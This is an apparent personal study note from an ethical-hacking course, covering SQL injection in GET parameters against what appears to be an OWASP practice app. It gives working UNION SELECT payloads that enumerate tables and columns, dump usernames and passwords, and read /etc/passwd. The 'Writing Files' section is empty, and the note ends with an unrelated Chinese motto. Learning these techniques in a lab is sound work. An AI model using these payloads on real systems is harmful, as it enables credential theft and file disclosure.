Ethical Hacking - Web Penetration Testing(9)
SQL INJECTION
Discovering SQLi in GET
Inject by browser URL.
Selecting Data From Database
Change the number to a big one, then you can get a useful error message. And you can try different number to find the right column.
Using “union select 1,2,3,4,5” to find the right column.
Then replace it with the information we want to get. (database, user, version)
Finding Database Tables
union select 1,table_name,null,null,5 from information_schema.tables where table_schema = 'owasp10'
Extracting Sensitive Data Such As Passwords.
union select 1,column_name,null,null,5 from information_schema.columns where table_name = 'accounts'
union select 1,username,password,is_admin,5 from accounts
Reading Files
union select null,load_file('/etc/passwd'),null,null,null
Writing Files
相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。